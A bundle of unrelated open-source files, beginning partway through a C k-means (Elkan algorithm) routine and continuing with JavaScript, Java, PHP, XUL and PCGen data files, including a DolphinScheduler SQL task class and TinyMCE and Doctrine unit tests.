}
/* closest cluster distance */
for(c = 0 ; c < f->K ; ++c) {
vl_ikmacc_t best_dist = VL_IKMACC_MAX ;
for(cp = 0 ; cp < f->K ; ++cp) {
dist = d_pt[c * f->K + cp] ;
if(c != cp && dist < best_dist) best_dist = dist ;
}
s_pt[c] = best_dist >> 2 ;
}
/* ------------------------------------------------------------------
* Assign data to centers
* ---------------------------------------------------------------- */
done = 1 ;
for(x = 0 ; x < N ; ++x) {
vl_uindex cx = (vl_uindex) asgn[x] ;
vl_ikmacc_t ux = u_pt[x] ;
/* ux is an upper bound of the distance of x to its
current center cx. s_pt[cx] is half of the minum distance
between the cluster cx and any other cluster center. If
ux <= s_pt[cx] then x remains attached to cx. */
if(ux <= s_pt[cx]) continue ;
for(c = 0 ; c < f->K ; ++c) {
vl_ikmacc_t dist = 0 ;
/* so x might need to be re-associated from cx to c. We can
exclude c if
1 - cx = c (trivial) or
2 - u(x) <= l(x,c) as this implies d(x,cx) <= d(x,c) or
3 - u(x) <= d(cx,c)/2 as this implies d(x,cx) <= d(x,c).
*/
if(c == cx ||
ux <= l_pt[N * c + x] ||
ux <= d_pt[f->K * c + cx])
continue ;
/* we need to make a true comparison */
/* if u_pt[x] is stale (i.e. not strictly equal to
d(x,cx)), then re-calcualte it. */
if( r_pt[x] ) {
dist_calc++;
for(dist = 0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = (vl_ikmacc_t)data[x * f->M + i] - f->centers[cx * f->M + i] ;
dist += delta*delta ;
}
ux = u_pt[x] = dist ;
r_pt[x] = 0 ;
/* now that u_pt[x] is updated, we check the conditions
again */
if(
ux <= l_pt[N * c + x] ||
ux <= d_pt[f->K * c + cx] )
continue ;
}
/* no way... we need to compute the distance d(x,c) */
dist_calc++ ;
for(dist = 0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = (vl_ikmacc_t)data[ x * f->M + i] - f->centers[c * f->M + i] ;
dist += delta * delta ;
}
l_pt[N * c + x] = dist ;
if (dist < ux) {
ux = u_pt[x] = dist ;
/* r_pt[x] already 0 */
asgn[x] = (vl_uint32)c ;
done = 0 ;
}
}
} /* next data point */
/* stopping condition */
if(done || pass == f->max_niters) {
break ;
}
}
vl_free (counts) ;
vl_free (asgn) ;
vl_free (l_pt) ;
vl_free (s_pt) ;
vl_free (r_pt) ;
vl_free (u_pt) ;
vl_free (m_pt) ;
if (f-> verb) {
VL_PRINTF ("ikm: Elkan algorithm: total iterations: %d\n", pass) ;
VL_PRINTF ("ikm: Elkan algorithm: distance calculations: %d (speedup: %.2f)\n",
dist_calc, (float)N * f->K * (pass+2) / dist_calc - 1) ;
}
return 0 ;
}
/** @internal
** @brief Elkan algorithm
** @param f IKM quantizer.
** @param asgn Assignment of data to centers (out).
** @param data Data to quantize.
** @param N Number of data elements.
**/
static void
vl_ikm_push_elkan (VlIKMFilt *f, vl_uint32 *asgn, vl_uint8 const *data, vl_size N)
{
vl_uindex i,c,cx,x ;
vl_size dist_calc = 0 ;
vl_ikmacc_t dist, best_dist ;
vl_ikmacc_t *d_pt = f->inter_dist ;
/* assign data to centers */
for(x = 0 ; x < N ; ++x) {
best_dist = VL_IKMACC_MAX ;
cx = 0 ;
for(c = 0 ; c < f->K ; ++c) {
if(d_pt[f->K * cx + c] < best_dist) {
/* might need to be updated */
dist_calc ++ ;
for(dist=0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = data[x * f->M + i] - f->centers[c * f->M + i] ;
dist += delta * delta ;
}
/* u_pt is strict at the beginning */
if(dist < best_dist) {
best_dist = dist ;
cx = c ;
}
}
}
asgn[x] = (vl_uint32)cx ;
}
}
/*
* Local Variables: *
* mode: C *
* End: *
*/
| {
"pile_set_name": "Github"
} |
var ListCache = require('./_ListCache'),
MapCache = require('./_MapCache');
/** Used as the size to enable large array optimizations. */
var LARGE_ARRAY_SIZE = 200;
/**
* Sets the stack `key` to `value`.
*
* @private
* @name set
* @memberOf Stack
* @param {string} key The key of the value to set.
* @param {*} value The value to set.
* @returns {Object} Returns the stack cache instance.
*/
function stackSet(key, value) {
var cache = this.__data__;
if (cache instanceof ListCache && cache.__data__.length == LARGE_ARRAY_SIZE) {
cache = this.__data__ = new MapCache(cache.__data__);
}
cache.set(key, value);
return this;
}
module.exports = stackSet;
| {
"pile_set_name": "Github"
} |
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.ui;
import com.intellij.openapi.Disposable;
import com.intellij.openapi.ui.popup.Balloon;
import com.intellij.openapi.ui.popup.BalloonBuilder;
import com.intellij.openapi.ui.popup.JBPopupFactory;
import com.intellij.openapi.util.Disposer;
import com.intellij.openapi.util.NlsContexts;
import com.intellij.openapi.util.text.HtmlBuilder;
import com.intellij.openapi.util.text.HtmlChunk;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.ui.awt.RelativePoint;
import com.intellij.util.ui.PositionTracker;
import com.intellij.util.ui.UIUtil;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.event.HyperlinkListener;
import java.awt.*;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
/**
* @author Konstantin Bulenkov
*/
public final class GotItMessage {
@NotNull private final @NlsContexts.PopupContent String myTitle;
@NotNull private final @NlsContexts.PopupContent String myMessage;
private Disposable myDisposable;
private Runnable myCallback;
private HyperlinkListener myHyperlinkListener = BrowserHyperlinkListener.INSTANCE;
private boolean myShowCallout = true;
private GotItMessage(@NlsContexts.PopupContent @NotNull String title, @NlsContexts.PopupContent @NotNull String message) {
myTitle = title;
myMessage =
new HtmlBuilder()
.append(HtmlChunk.div("font-family: \" + UIUtil.getLabelFont().getFontName() + \"; font-size: \" +\n" +
" JBUIScale.scale(12) + \"pt;")
.attr("align", "center")
.addRaw(StringUtil.replace(message, "\n", "<br>")))
.wrapWithHtmlBody()
.toString();
}
public static GotItMessage createMessage(@NotNull @NlsContexts.PopupTitle String title, @NotNull @NlsContexts.PopupContent String message) {
return new GotItMessage(title, message);
}
public GotItMessage setDisposable(Disposable disposable) {
myDisposable = disposable;
return this;
}
public GotItMessage setCallback(@Nullable Runnable callback) {
myCallback = callback;
return this;
}
public GotItMessage setHyperlinkListener(@Nullable HyperlinkListener hyperlinkListener) {
myHyperlinkListener = hyperlinkListener;
return this;
}
public GotItMessage setShowCallout(boolean showCallout) {
myShowCallout = showCallout;
return this;
}
public void show(@NotNull RelativePoint point, @NotNull Balloon.Position position) {
show(new PositionTracker.Static<>(point), position);
}
public void show(@NotNull PositionTracker<Balloon> tracker, @NotNull Balloon.Position position) {
if (myDisposable != null && Disposer.isDisposed(myDisposable)) {
return;
}
final GotItPanel panel = new GotItPanel();
panel.myTitle.setText(myTitle);
panel.myMessage.setText(myMessage);
if (myHyperlinkListener != null) {
panel.myMessage.addHyperlinkListener(myHyperlinkListener);
}
panel.myButton.setCursor(Cursor.getPredefinedCursor(Cursor.HAND_CURSOR));
final BalloonBuilder builder = JBPopupFactory.getInstance().createBalloonBuilder(panel.myRoot);
if (myDisposable != null) {
builder.setDisposable(myDisposable);
}
final Balloon balloon = builder
.setFillColor(UIUtil.getListBackground())
.setHideOnClickOutside(false)
.setHideOnAction(false)
.setHideOnFrameResize(false)
.setHideOnKeyOutside(false)
.setShowCallout(myShowCallout)
.setBlockClicksThroughBalloon(true)
.createBalloon();
panel.myButton.addMouseListener(new MouseAdapter() {
@Override
public void mouseClicked(MouseEvent e) {
balloon.hide();
if (myCallback != null) {
myCallback.run();
}
}
});
balloon.show(tracker, position);
}
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.dolphinscheduler.server.worker.task.sql;
import com.fasterxml.jackson.databind.node.ArrayNode;
import com.fasterxml.jackson.databind.node.ObjectNode;
import org.apache.commons.lang.StringUtils;
import org.apache.dolphinscheduler.alert.utils.MailUtils;
import org.apache.dolphinscheduler.common.Constants;
import org.apache.dolphinscheduler.common.enums.*;
import org.apache.dolphinscheduler.common.enums.DbType;
import org.apache.dolphinscheduler.common.enums.ShowType;
import org.apache.dolphinscheduler.common.enums.TaskTimeoutStrategy;
import org.apache.dolphinscheduler.common.process.Property;
import org.apache.dolphinscheduler.common.task.AbstractParameters;
import org.apache.dolphinscheduler.common.task.sql.SqlBinds;
import org.apache.dolphinscheduler.common.task.sql.SqlParameters;
import org.apache.dolphinscheduler.common.task.sql.SqlType;
import org.apache.dolphinscheduler.common.utils.*;
import org.apache.dolphinscheduler.dao.AlertDao;
import org.apache.dolphinscheduler.dao.datasource.BaseDataSource;
import org.apache.dolphinscheduler.dao.datasource.DataSourceFactory;
import org.apache.dolphinscheduler.dao.entity.User;
import org.apache.dolphinscheduler.server.entity.SQLTaskExecutionContext;
import org.apache.dolphinscheduler.server.entity.TaskExecutionContext;
import org.apache.dolphinscheduler.server.utils.ParamUtils;
import org.apache.dolphinscheduler.server.utils.UDFUtils;
import org.apache.dolphinscheduler.server.worker.task.AbstractTask;
import org.apache.dolphinscheduler.service.bean.SpringApplicationContext;
import org.slf4j.Logger;
import java.sql.*;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import static org.apache.dolphinscheduler.common.Constants.*;
import static org.apache.dolphinscheduler.common.enums.DbType.HIVE;
/**
* sql task
*/
public class SqlTask extends AbstractTask {
/**
* sql parameters
*/
private SqlParameters sqlParameters;
/**
* alert dao
*/
private AlertDao alertDao;
/**
* base datasource
*/
private BaseDataSource baseDataSource;
/**
* taskExecutionContext
*/
private TaskExecutionContext taskExecutionContext;
/**
* default query sql limit
*/
private static final int LIMIT = 10000;
public SqlTask(TaskExecutionContext taskExecutionContext, Logger logger) {
super(taskExecutionContext, logger);
this.taskExecutionContext = taskExecutionContext;
logger.info("sql task params {}", taskExecutionContext.getTaskParams());
this.sqlParameters = JSONUtils.parseObject(taskExecutionContext.getTaskParams(), SqlParameters.class);
if (!sqlParameters.checkParameters()) {
throw new RuntimeException("sql task params is not valid");
}
this.alertDao = SpringApplicationContext.getBean(AlertDao.class);
}
@Override
public void handle() throws Exception {
// set the name of the current thread
String threadLoggerInfoName = String.format(Constants.TASK_LOG_INFO_FORMAT, taskExecutionContext.getTaskAppId());
Thread.currentThread().setName(threadLoggerInfoName);
logger.info("Full sql parameters: {}", sqlParameters);
logger.info("sql type : {}, datasource : {}, sql : {} , localParams : {},udfs : {},showType : {},connParams : {}",
sqlParameters.getType(),
sqlParameters.getDatasource(),
sqlParameters.getSql(),
sqlParameters.getLocalParams(),
sqlParameters.getUdfs(),
sqlParameters.getShowType(),
sqlParameters.getConnParams());
try {
SQLTaskExecutionContext sqlTaskExecutionContext = taskExecutionContext.getSqlTaskExecutionContext();
// load class
DataSourceFactory.loadClass(DbType.valueOf(sqlParameters.getType()));
// get datasource
baseDataSource = DataSourceFactory.getDatasource(DbType.valueOf(sqlParameters.getType()),
sqlTaskExecutionContext.getConnectionParams());
// ready to execute SQL and parameter entity Map
SqlBinds mainSqlBinds = getSqlAndSqlParamsMap(sqlParameters.getSql());
List<SqlBinds> preStatementSqlBinds = Optional.ofNullable(sqlParameters.getPreStatements())
.orElse(new ArrayList<>())
.stream()
.map(this::getSqlAndSqlParamsMap)
.collect(Collectors.toList());
List<SqlBinds> postStatementSqlBinds = Optional.ofNullable(sqlParameters.getPostStatements())
.orElse(new ArrayList<>())
.stream()
.map(this::getSqlAndSqlParamsMap)
.collect(Collectors.toList());
List<String> createFuncs = UDFUtils.createFuncs(sqlTaskExecutionContext.getUdfFuncTenantCodeMap(),
logger);
// execute sql task
executeFuncAndSql(mainSqlBinds, preStatementSqlBinds, postStatementSqlBinds, createFuncs);
setExitStatusCode(Constants.EXIT_CODE_SUCCESS);
} catch (Exception e) {
setExitStatusCode(Constants.EXIT_CODE_FAILURE);
logger.error("sql task error", e);
throw e;
}
}
/**
* ready to execute SQL and parameter entity Map
* @return SqlBinds
*/
private SqlBinds getSqlAndSqlParamsMap(String sql) {
Map<Integer,Property> sqlParamsMap = new HashMap<>();
StringBuilder sqlBuilder = new StringBuilder();
// find process instance by task id
Map<String, Property> paramsMap = ParamUtils.convert(ParamUtils.getUserDefParamsMap(taskExecutionContext.getDefinedParams()),
taskExecutionContext.getDefinedParams(),
sqlParameters.getLocalParametersMap(),
CommandType.of(taskExecutionContext.getCmdTypeIfComplement()),
taskExecutionContext.getScheduleTime());
// spell SQL according to the final user-defined variable
if(paramsMap == null){
sqlBuilder.append(sql);
return new SqlBinds(sqlBuilder.toString(), sqlParamsMap);
}
if (StringUtils.isNotEmpty(sqlParameters.getTitle())){
String title = ParameterUtils.convertParameterPlaceholders(sqlParameters.getTitle(),
ParamUtils.convert(paramsMap));
logger.info("SQL title : {}",title);
sqlParameters.setTitle(title);
}
//new
//replace variable TIME with $[YYYYmmddd...] in sql when history run job and batch complement job
sql = ParameterUtils.replaceScheduleTime(sql, taskExecutionContext.getScheduleTime());
// special characters need to be escaped, ${} needs to be escaped
String rgex = "['\"]*\\$\\{(.*?)\\}['\"]*";
setSqlParamsMap(sql, rgex, sqlParamsMap, paramsMap);
// replace the ${} of the SQL statement with the Placeholder
String formatSql = sql.replaceAll(rgex, "?");
sqlBuilder.append(formatSql);
// print repalce sql
printReplacedSql(sql, formatSql, rgex, sqlParamsMap);
return new SqlBinds(sqlBuilder.toString(), sqlParamsMap);
}
@Override
public AbstractParameters getParameters() {
return this.sqlParameters;
}
/**
* execute function and sql
* @param mainSqlBinds main sql binds
* @param preStatementsBinds pre statements binds
* @param postStatementsBinds post statements binds
* @param createFuncs create functions
*/
public void executeFuncAndSql(SqlBinds mainSqlBinds,
List<SqlBinds> preStatementsBinds,
List<SqlBinds> postStatementsBinds,
List<String> createFuncs){
Connection connection = null;
PreparedStatement stmt = null;
ResultSet resultSet = null;
try {
// if upload resource is HDFS and kerberos startup
CommonUtils.loadKerberosConf();
// create connection
connection = createConnection();
// create temp function
if (CollectionUtils.isNotEmpty(createFuncs)) {
createTempFunction(connection,createFuncs);
}
// pre sql
preSql(connection,preStatementsBinds);
stmt = prepareStatementAndBind(connection, mainSqlBinds);
// decide whether to executeQuery or executeUpdate based on sqlType
if (sqlParameters.getSqlType() == SqlType.QUERY.ordinal()) {
// query statements need to be convert to JsonArray and inserted into Alert to send
resultSet = stmt.executeQuery();
resultProcess(resultSet);
} else if (sqlParameters.getSqlType() == SqlType.NON_QUERY.ordinal()) {
// non query statement
stmt.executeUpdate();
}
postSql(connection,postStatementsBinds);
} catch (Exception e) {
logger.error("execute sql error",e);
throw new RuntimeException("execute sql error");
} finally {
close(resultSet,stmt,connection);
}
}
/**
* result process
*
* @param resultSet resultSet
* @throws Exception Exception
*/
private void resultProcess(ResultSet resultSet) throws Exception{
ArrayNode resultJSONArray = JSONUtils.createArrayNode();
ResultSetMetaData md = resultSet.getMetaData();
int num = md.getColumnCount();
int rowCount = 0;
while (rowCount < LIMIT && resultSet.next()) {
ObjectNode mapOfColValues = JSONUtils.createObjectNode();
for (int i = 1; i <= num; i++) {
mapOfColValues.set(md.getColumnLabel(i), JSONUtils.toJsonNode(resultSet.getObject(i)));
}
resultJSONArray.add(mapOfColValues);
rowCount++;
}
String result = JSONUtils.toJsonString(resultJSONArray);
logger.debug("execute sql : {}", result);
sendAttachment(StringUtils.isNotEmpty(sqlParameters.getTitle()) ?
sqlParameters.getTitle(): taskExecutionContext.getTaskName() + " query result sets",
JSONUtils.toJsonString(resultJSONArray));
}
/**
* pre sql
*
* @param connection connection
* @param preStatementsBinds preStatementsBinds
*/
private void preSql(Connection connection,
List<SqlBinds> preStatementsBinds) throws Exception{
for (SqlBinds sqlBind: preStatementsBinds) {
try (PreparedStatement pstmt = prepareStatementAndBind(connection, sqlBind)){
int result = pstmt.executeUpdate();
logger.info("pre statement execute result: {}, for sql: {}",result,sqlBind.getSql());
}
}
}
/**
* post sql
*
* @param connection connection
* @param postStatementsBinds postStatementsBinds
* @throws Exception
*/
private void postSql(Connection connection,
List<SqlBinds> postStatementsBinds) throws Exception{
for (SqlBinds sqlBind: postStatementsBinds) {
try (PreparedStatement pstmt = prepareStatementAndBind(connection, sqlBind)){
int result = pstmt.executeUpdate();
logger.info("post statement execute result: {},for sql: {}",result,sqlBind.getSql());
}
}
}
/**
* create temp function
*
* @param connection connection
* @param createFuncs createFuncs
* @throws Exception
*/
private void createTempFunction(Connection connection,
List<String> createFuncs) throws Exception{
try (Statement funcStmt = connection.createStatement()) {
for (String createFunc : createFuncs) {
logger.info("hive create function sql: {}", createFunc);
funcStmt.execute(createFunc);
}
}
}
/**
* create connection
*
* @return connection
* @throws Exception Exception
*/
private Connection createConnection() throws Exception{
// if hive , load connection params if exists
Connection connection = null;
if (HIVE == DbType.valueOf(sqlParameters.getType())) {
Properties paramProp = new Properties();
paramProp.setProperty(USER, baseDataSource.getUser());
paramProp.setProperty(PASSWORD, baseDataSource.getPassword());
Map<String, String> connParamMap = CollectionUtils.stringToMap(sqlParameters.getConnParams(),
SEMICOLON,
HIVE_CONF);
paramProp.putAll(connParamMap);
connection = DriverManager.getConnection(baseDataSource.getJdbcUrl(),
paramProp);
}else{
connection = DriverManager.getConnection(baseDataSource.getJdbcUrl(),
baseDataSource.getUser(),
baseDataSource.getPassword());
}
return connection;
}
/**
* close jdbc resource
*
* @param resultSet resultSet
* @param pstmt pstmt
* @param connection connection
*/
private void close(ResultSet resultSet,
PreparedStatement pstmt,
Connection connection){
if (resultSet != null){
try {
resultSet.close();
} catch (SQLException e) {
logger.error("close result set error : {}",e.getMessage(),e);
}
}
if (pstmt != null){
try {
pstmt.close();
} catch (SQLException e) {
logger.error("close prepared statement error : {}",e.getMessage(),e);
}
}
if (connection != null){
try {
connection.close();
} catch (SQLException e) {
logger.error("close connection error : {}",e.getMessage(),e);
}
}
}
/**
* preparedStatement bind
* @param connection connection
* @param sqlBinds sqlBinds
* @return PreparedStatement
* @throws Exception Exception
*/
private PreparedStatement prepareStatementAndBind(Connection connection, SqlBinds sqlBinds) throws Exception {
// is the timeout set
boolean timeoutFlag = TaskTimeoutStrategy.of(taskExecutionContext.getTaskTimeoutStrategy()) == TaskTimeoutStrategy.FAILED ||
TaskTimeoutStrategy.of(taskExecutionContext.getTaskTimeoutStrategy()) == TaskTimeoutStrategy.WARNFAILED;
PreparedStatement stmt = connection.prepareStatement(sqlBinds.getSql());
if(timeoutFlag){
stmt.setQueryTimeout(taskExecutionContext.getTaskTimeout());
}
Map<Integer, Property> params = sqlBinds.getParamsMap();
if(params != null) {
for (Map.Entry<Integer, Property> entry : params.entrySet()) {
Property prop = entry.getValue();
ParameterUtils.setInParameter(entry.getKey(), stmt, prop.getType(), prop.getValue());
}
}
logger.info("prepare statement replace sql : {} ", stmt);
return stmt;
}
/**
* send mail as an attachment
* @param title title
* @param content content
*/
public void sendAttachment(String title,String content){
List<User> users = alertDao.queryUserByAlertGroupId(taskExecutionContext.getSqlTaskExecutionContext().getWarningGroupId());
// receiving group list
List<String> receiversList = new ArrayList<>();
for(User user:users){
receiversList.add(user.getEmail().trim());
}
// custom receiver
String receivers = sqlParameters.getReceivers();
if (StringUtils.isNotEmpty(receivers)){
String[] splits = receivers.split(COMMA);
for (String receiver : splits){
receiversList.add(receiver.trim());
}
}
// copy list
List<String> receiversCcList = new ArrayList<>();
// Custom Copier
String receiversCc = sqlParameters.getReceiversCc();
if (StringUtils.isNotEmpty(receiversCc)){
String[] splits = receiversCc.split(COMMA);
for (String receiverCc : splits){
receiversCcList.add(receiverCc.trim());
}
}
String showTypeName = sqlParameters.getShowType().replace(COMMA,"").trim();
if(EnumUtils.isValidEnum(ShowType.class,showTypeName)){
Map<String, Object> mailResult = MailUtils.sendMails(receiversList,
receiversCcList, title, content, ShowType.valueOf(showTypeName).getDescp());
if(!(boolean) mailResult.get(STATUS)){
throw new RuntimeException("send mail failed!");
}
}else{
logger.error("showType: {} is not valid " ,showTypeName);
throw new RuntimeException(String.format("showType: %s is not valid ",showTypeName));
}
}
/**
* regular expressions match the contents between two specified strings
* @param content content
* @param rgex rgex
* @param sqlParamsMap sql params map
* @param paramsPropsMap params props map
*/
public void setSqlParamsMap(String content, String rgex, Map<Integer,Property> sqlParamsMap, Map<String,Property> paramsPropsMap){
Pattern pattern = Pattern.compile(rgex);
Matcher m = pattern.matcher(content);
int index = 1;
while (m.find()) {
String paramName = m.group(1);
Property prop = paramsPropsMap.get(paramName);
sqlParamsMap.put(index,prop);
index ++;
}
}
/**
* print replace sql
* @param content content
* @param formatSql format sql
* @param rgex rgex
* @param sqlParamsMap sql params map
*/
public void printReplacedSql(String content, String formatSql,String rgex, Map<Integer,Property> sqlParamsMap){
//parameter print style
logger.info("after replace sql , preparing : {}" , formatSql);
StringBuilder logPrint = new StringBuilder("replaced sql , parameters:");
for(int i=1;i<=sqlParamsMap.size();i++){
logPrint.append(sqlParamsMap.get(i).getValue()+"("+sqlParamsMap.get(i).getType()+")");
}
logger.info("Sql Params are {}", logPrint);
}
}
| {
"pile_set_name": "Github"
} |
/**
* @author Qi Liu / https://github.com/lq3297401
*/
var JuicyCakeStyle = ( function () {
return {
color: {
surface: 0xCE26D4,
selected: 0xE8F000,
in: 0xF7BB2F,
out: 0xE155AB,
halo: 0xF9A6FF,
background: 0x000000
},
brightness: {
ocean: 0.5,
mentioned: 0.5,
related: 0.5
}
}
}() );
export { JuicyCakeStyle } | {
"pile_set_name": "Github"
} |
import { Assertions } from '@ephox/agar';
import { UnitTest } from '@ephox/bedrock-client';
import { Arr } from '@ephox/katamari';
import * as Newlines from 'tinymce/plugins/paste/core/Newlines';
import PastePlugin from 'tinymce/plugins/paste/Plugin';
import Theme from 'tinymce/themes/silver/Theme';
UnitTest.test('tinymce.plugins.paste.browser.NewlinesTest', function () {
Theme();
PastePlugin();
// testing Newlines.isPlainText()
const textCases = [
{
label: 'TestCase-TBA: Paste: Basic Chrome markup (including span-wrapped tab)',
content: '<div><span style="white-space:pre"> </span>a</div><div><br></div><div>b</div>',
isText: true
},
{
label: `TestCase-TBA: Paste: Case shouldn't matter`,
content: '<DIV>a</DIV><DIV><BR></DIV>',
isText: true
},
{
label: 'TestCase-TBA: Paste: Support all BR types',
content: '<br><br />',
isText: true
},
{
label: 'TestCase-TBA: Paste: Basic IE markup',
content: '<p>a</p><p><br></p><p>b</p>',
isText: true
},
{
label: 'TestCase-TBA: Paste: White-space wrapper (Chrome)',
content: '<div><span style="white-space: pre;"> </span>a</div>',
isText: true
},
{
label: 'TestCase-TBA: Paste: White-space wrapper (Chrome) with additional styles',
content: '<div><span style="white-space: pre; color: red;"> </span>a</div>',
isText: false
},
{
label: 'TestCase-TBA: Paste: Allowed tag but with attributes qualifies string as not a plain text',
content: '<br data-mce-bogus="all" />',
isText: false
}
];
// only DIV,P,BR and SPAN[style="white-space:pre"] tags are allowed in "plain text" string
Arr.each(
('a,abbr,address,article,aside,audio,b,bdi,bdo,blockquote,button,cite,' +
'code,del,details,dfn,dl,em,embed,fieldset,figure,footer,form,h1,h2,h3,' +
'h4,h5,h6,header,hgroup,hr,i,ins,label,menu,nav,noscript,object,ol,pre,' +
'q,s,script,section,select,small,strong,style,sub,sup,svg,table,textarea,' +
'time,u,ul,var,video,wbr').split(','),
function (tag) {
const content = '<p>a</p><' + tag + '>b</' + tag + '><p>c<br>d</p>';
textCases.push({
label: tag.toUpperCase() + ' tag should qualify content (' + content + ') as not a plain text',
content,
isText: false
});
}
);
Arr.each(textCases, function (c) {
Assertions.assertEq(c.label || 'Asserting: ' + c.content, c.isText, Newlines.isPlainText(c.content));
});
});
| {
"pile_set_name": "Github"
} |
<?php
include_once dirname(__FILE__) . '/../../../bootstrap/unit.php';
include_once dirname(__FILE__) . '/../../../bootstrap/database.php';
$t = new lime_test(4);
//------------------------------------------------------------
$t->diag('BannerImage: Cascading Delete');
$conn->beginTransaction();
$bannerImage = Doctrine_Core::getTable('BannerImage')->find(1);
$bannerUseImage = $bannerImage->BannerUseImage[0];
$file = $bannerImage->File;
$bannerImage->delete($conn);
$t->ok(!Doctrine_Core::getTable('BannerImage')->find($bannerImage->id), 'banner_image is deleted.');
$t->ok(!Doctrine_Core::getTable('BannerUseImage')->find($bannerUseImage->id), 'banner_use_image is deleted.');
$t->ok(!Doctrine_Core::getTable('File')->find($file->id), 'file is deleted.');
$t->ok(!Doctrine_Core::getTable('FileBin')->find($file->id), 'file_bin is deleted.');
$conn->rollback();
| {
"pile_set_name": "Github"
} |
<?php
/**
*
* This file is part of Aura for PHP.
*
* @license http://opensource.org/licenses/bsd-license.php BSD
*
*/
namespace Aura\Filter\Failure;
use JsonSerializable;
/**
*
* Represents the failure of a rule specification.
*
* @package Aura.Filter
*
*/
class Failure implements JsonSerializable
{
/**
*
* The field that failed.
*
* @var string
*
*/
protected $field;
/**
*
* The failure message.
*
* @var string
*
*/
protected $message;
/**
*
* The arguments passed to the rule specification.
*
* @var array
*
*/
protected $args = array();
/**
*
* Constructor.
*
* @param string $field The field that failed.
*
* @param string $message The failure message.
*
* @param array $args The arguments passed to the rule specification.
*
* @return self
*
*/
public function __construct(
$field,
$message,
array $args = array()
) {
$this->field = $field;
$this->message = $message;
$this->args = $args;
}
/**
*
* Returns the field that failed.
*
* @return string
*
*/
public function getField()
{
return $this->field;
}
/**
*
* Returns the failure message.
*
* @return string
*
*/
public function getMessage()
{
return $this->message;
}
/**
*
* Returns the arguments passed to the rule specification.
*
* @return array
*
*/
public function getArgs()
{
return $this->args;
}
/**
*
* Returns an array for json_encode.
*
* @return array
*
*/
public function jsonSerialize()
{
return array(
'field' => $this->field,
'message' => $this->message,
'args' => $this->args,
);
}
}
| {
"pile_set_name": "Github"
} |
<window xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
xmlns:html="http://www.w3.org/1999/xhtml"
class="reftest-wait">
<script type="text/javascript"><![CDATA[
function run() {
const XUL_NS = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul";
const HTML_NS = "http://www.w3.org/1999/xhtml";
var window = document.getElementsByTagName("window")[0];
var span = document.createElementNS(HTML_NS, "html:span");
window.appendChild(span); // causes block wrapping
setTimeout(finish, 0);
}
function finish() {
document.documentElement.removeAttribute("class");
}
function load(event) {
setTimeout(run, 0);
}
window.addEventListener("load", load, false);
]]></script>
<box flex="1" />
<label value="hello world" />
</window>
| {
"pile_set_name": "Github"
} |
# Fri Nov 16 19:52:40 2018 -- reformated by PCGen PrettyLST v6.08.00
# CVS $Revision: $ $Author: $ -- Thu Nov 26 22:25:37 2015 -- reformated by PCGen PrettyLST v6.05.01
#SOURCELONG:Occult Adventures SOURCESHORT:OA SOURCEWEB:http://paizo.com/products/btpy9a0h
# Class feature types
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Kineticist Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Kineticist Class Feature.KineticistClassFeatures PLURAL:Kineticist Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Medium Class Feature.MediumClassFeatures PLURAL:Medium Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Mesmerist Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Mesmerist Class Feature.MesmeristClassFeatures PLURAL:Mesmerist Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Occultist Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Occultist Class Feature.OccultistClassFeatures PLURAL:Occultist Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Psychic Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Psychic Class Feature.PsychicClassFeatures PLURAL:Psychic Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Spiritualist Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Spiritualist Class Feature.SpiritualistClassFeatures PLURAL:Spiritualist Class Features DISPLAYLOCATION:Class Features
# Archetypes
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Kineticist Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Kineticist Archetype.KineticistArchetype PLURAL:Kineticist Archetypes DISPLAYLOCATION:Archetype
ABILITYCATEGORY:Medium Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Medium Archetype.MediumArchetype PLURAL:Medium Archetypes DISPLAYLOCATION:Archetype
ABILITYCATEGORY:Mesmerist Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Mesmerist Archetype.MesmeristArchetype PLURAL:Mesmerist Archetypes DISPLAYLOCATION:Archetype
